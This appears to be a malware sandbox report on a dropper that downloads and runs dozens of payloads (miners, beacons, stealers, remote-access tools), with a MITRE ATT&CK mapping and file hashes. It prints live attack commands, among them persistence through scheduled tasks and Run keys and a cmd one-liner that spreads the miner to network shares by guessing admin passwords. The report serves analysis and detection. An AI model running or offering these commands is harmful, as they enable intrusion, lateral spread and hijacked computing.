        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff9630fcc40,0x7ff9630fcc4c,0x7ff9630fcc58
        5⤵
        
        PID:6032
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
      4⤵
      PID:896
- C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe"
  2⤵
  PID:6772
- - C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe"
    3⤵
    PID:7516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:6868
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\1.exe"
        5⤵
        Views/modifies file attributes
        
        PID:7844
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /tn Delete1ExeAfterDelay /tr "del \"C:\Users\Admin\AppData\Roaming\1.exe\"" /sc once /st 16:46 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6316
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /tn Delete1ExeOnReboot /tr "del \"C:\Users\Admin\AppData\Roaming\1.exe\"" /sc onstart /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      PID:6492
    - - C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        5⤵
        
        PID:7052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:5076
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainmtQ.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainmtQ.exe.exe"
  2⤵
  PID:5516
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainskeet.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainskeet.exe.exe"
  2⤵
  PID:2076
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp14.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp14.exe.exe"
  2⤵
  PID:5484
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp22.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp22.exe.exe"
  2⤵
  PID:7632
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainExtreme%20Injector%20v3.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainExtreme%20Injector%20v3.exe.exe"
  2⤵
  PID:6072
- - C:\Users\Admin\AppData\Local\Temp\Exela.exe
    "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
    3⤵
    PID:8104
  - - C:\Users\Admin\AppData\Local\Temp\Exela.exe
      "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
      4⤵
      PID:6052
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:7180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:3420
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3644
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        
        PID:4680
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        
        PID:3040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:5208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:4076
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:6448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        
        PID:6856
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:6652
- - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
    "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
    3⤵
    PID:5764
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp50.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp50.exe.exe"
  2⤵
  PID:2552
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRoot.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRoot.exe.exe"
  2⤵
  PID:216
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainjopa.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainjopa.exe.exe"
  2⤵
  PID:5608
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainkooki.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainkooki.exe.exe"
  2⤵
  PID:6212
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainvmss.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainvmss.exe.exe"
  2⤵
  PID:7224
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRuntimeBroker.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRuntimeBroker.exe.exe"
  2⤵
  PID:6844
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCHROM.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCHROM.exe.exe"
  2⤵
  PID:848
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp32.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp32.exe.exe"
  2⤵
  PID:6784
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCONHOST.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCONHOST.exe.exe"
  2⤵
  PID:8096
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainputisha.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainputisha.exe.exe"
  2⤵
  PID:7404
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindows.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindows.exe.exe"
  2⤵
  PID:7256
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp23.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp23.exe.exe"
  2⤵
  PID:6192
- C:\Users\Admin\AppData\Local\Temp\http194.38.22.120xmrig.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http194.38.22.120xmrig.exe.exe"
  2⤵
  PID:2996
- C:\Users\Admin\AppData\Local\Temp\http212.57.37.63nc.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http212.57.37.63nc.exe.exe"
  2⤵
  PID:1688
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1824
- C:\Users\Admin\AppData\Local\Temp\http200.14.250.72IMG001.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http200.14.250.72IMG001.exe.exe"
  2⤵
  PID:552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
    3⤵
    PID:6068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im tftp.exe
      4⤵
      Kills process with taskkill
      PID:2436
- - C:\Users\Admin\AppData\Local\Temp\tftp.exe
    "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
    3⤵
    PID:5764
- - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
    "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
    3⤵
    PID:7984
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      PID:6728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        Kills process with taskkill
        
        PID:7760
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      PID:7732
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
      4⤵
      PID:7092
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        5⤵
        
        PID:4760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:7036
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8116
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:5704
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
      4⤵
      Power Settings
      PID:5536
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:7088
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:5180
    - - C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        5⤵
        Power Settings
        
        PID:4652
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1505& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
      4⤵
      Indicator Removal: Network Share Connection Removal
      PID:6296
- C:\Users\Admin\AppData\Local\Temp\httpsturkey-ivf.orgInvoice4231284.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsturkey-ivf.orgInvoice4231284.exe.exe"
  2⤵
  PID:7208
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e89d9b3b19f1f9d9\ScreenConnect.ClientSetup.msi"
    3⤵
    PID:3640
- C:\Users\Admin\AppData\Local\Temp\httpstheherbalhub.comwp-contentpluginssuper-socializerimagesjfufk.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpstheherbalhub.comwp-contentpluginssuper-socializerimagesjfufk.exe.exe"
  2⤵
  PID:188
- C:\Users\Admin\AppData\Local\Temp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.exe"
  2⤵
  PID:404
- - C:\Users\Admin\AppData\Local\Temp\is-JBU0Q.tmp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-JBU0Q.tmp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.tmp" /SL5="$30320,13626613,119296,C:\Users\Admin\AppData\Local\Temp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.exe"
    3⤵
    PID:6320
  - - C:\Users\Admin\AppData\Local\Temp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.exe" /VERYSILENT
      4⤵
      PID:5968
    - - C:\Users\Admin\AppData\Local\Temp\is-9BOT3.tmp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9BOT3.tmp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.tmp" /SL5="$20336,13626613,119296,C:\Users\Admin\AppData\Local\Temp\httpswww.littlemoroccanthings.comwp-contentpluginsheader-footer-code-managerimagesTestLAB.exe.exe" /VERYSILENT
        5⤵
        
        PID:3392
      - C:\Users\Admin\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe
        
        "C:\Users\Admin\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe"
        6⤵
        
        PID:7328
- C:\Users\Admin\AppData\Local\Temp\http185.7.214.54fg.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.7.214.54fg.exe.exe"
  2⤵
  PID:7712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ys0gg053\ys0gg053.cmdline"
    3⤵
    PID:2052
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56D1.tmp" "c:\Users\Admin\AppData\Local\Temp\ys0gg053\CSCD2820584F6274C3782B3B87010F1159F.TMP"
      4⤵
      PID:4836
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2532
- C:\Users\Admin\AppData\Local\Temp\httpstheherbalhub.comwp-contentpluginssuper-socializerimagespoll.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpstheherbalhub.comwp-contentpluginssuper-socializerimagespoll.exe.exe"
  2⤵
  PID:7600
- C:\Users\Admin\AppData\Local\Temp\httpshkuu.oss-cn-hongkong.aliyuncs.comhkuudown.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpshkuu.oss-cn-hongkong.aliyuncs.comhkuudown.exe.exe"
  2⤵
  PID:3776
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptm.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptm.exe.exe"
  2⤵
  PID:3876
- - C:\Users\Admin\AppData\Roaming\xenor\yavascript.exe
    "C:\Users\Admin\AppData\Roaming\xenor\yavascript.exe"
    3⤵
    PID:5436
- C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281beacon_x64.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281beacon_x64.exe.exe"
  2⤵
  PID:1160
- C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281artifact_moh.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281artifact_moh.exe.exe"
  2⤵
  PID:752
- C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281artifact_x64_testing.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281artifact_x64_testing.exe.exe"
  2⤵
  PID:748
- C:\Users\Admin\AppData\Local\Temp\http168.138.162.78output0clientupdate.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http168.138.162.78output0clientupdate.exe.exe"
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 1384
    3⤵
    - Program crash
    PID:4772
- C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281bea.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281bea.exe.exe"
  2⤵
  PID:7896
- C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281artifact_x64_test2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281artifact_x64_test2.exe.exe"
  2⤵
  PID:6320
- C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281beacon.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http20.74.209.19281beacon.exe.exe"
  2⤵
  PID:4168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3480 -ip 3480
1⤵
PID:3416

C:\ProgramData\WinUpla\winuspdt.exe
C:\ProgramData\WinUpla\winuspdt.exe
1⤵
PID:1428
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2456
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  PID:2524

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:3928

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:7356

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4688

C:\ProgramData\WinUpdt\wincsupdt.exe
C:\ProgramData\WinUpdt\wincsupdt.exe
1⤵
PID:2524
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:7660
- C:\Windows\system32\notepad.exe
  notepad.exe
  2⤵
  PID:6400

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:6960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:5128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:5740

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:7188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4372

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5104
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding BEEDEB1FA4ACAE2192F71E75CDCCC590 C
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8ED9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241607328 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    PID:8052

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:7312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4460 -ip 4460
1⤵
PID:5672

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:3984

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4696

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:2264

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
414B

MD5
c5c524f34dcd38160fa5e7e3dfbc6356

SHA1
367416f37aec2ffcd123c0ae84fc0d85a7f6b503

SHA256
be2ff185c5e64387813a6cf29963bd5e26dc3329f6ae2154f39d5546c237dd55

SHA512
893c5791e8e43170c9d872618cbf985e0f22e7938a7a0ce4f12bfd2833c716800bf36170e319b9bc98663b990da1cf0a1c21fedaccbec992d36fd57f7fe2eb13

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
02cc78327e9af88e3b375b2533df1cda

SHA1
6c2842eeca855acd1b2d625df0f4dc662185e232

SHA256
ed54b07d12ba8f0a69b0533540573f7ac3a5c261878b6b13b35e892a06b8a264

SHA512
fd2df44779df3c8cc782d04788df0468995fbed5517366a626f95d4bd66b614765ee0a0b1cd4e40536a69720e7b311d79b0079885682604655c3618dbd0d1204

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
2KB

MD5
dd986fd9ea8cfc830327759e47e2b284

SHA1
9fc92ec18faf355ffcae2c7b335b1f1d7ef3fe47

SHA256
16241abc0b7dba3a69e8006e9e32e28992f3f6c8ffa7bef19bea7b77b89bd147

SHA512
cab23d79c8946d8ead063ecbbcf9828a428791d09cee0149734b2438b4f94656a70a4ef27566ba39903bd58277741d283812f6d4425743018d41fa99b03a8e8b

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
3KB

MD5
4d1252c91978778067b6065eaa11b947

SHA1
e5134c21054b772a73108a2cda627f87a669009a

SHA256
33b30f85fde9a9624d06dcfcec6a85e35848b9fef44c142a995b362f0a27f2bd

SHA512
c2182d44e55256340a49e904708e84c7b3aa2f9d4b52639b5fb3fb08b4d2bc998d57ef5285e1cd702c99577d60cbd095d9c362ba3bff191f0635a19410ccab30

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
3KB

MD5
6dfb40d3471a61e208e61a0718145d6c

SHA1
029187534e4e6dac19084c1bbc578f51c04d8fe6

SHA256
7b824d269f34a0551e9360b3700f9b651ef70ffd428c65a58e2582906a8a8e93

SHA512
be8f8e9a0b0f6e39ead55812a25d3da1148ae833219c2789573ac08872540f8117215c22011b2eaa4773a2506cd3b0e906839c9619574e0dff5b43de12583fb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\Y2UC2NQ0\gate[1].htm

Filesize
167B

MD5
0104c301c5e02bd6148b8703d19b3a73

SHA1
7436e0b4b1f8c222c38069890b75fa2baf9ca620

SHA256
446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f

SHA512
84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\868529697.exe

Filesize
35KB

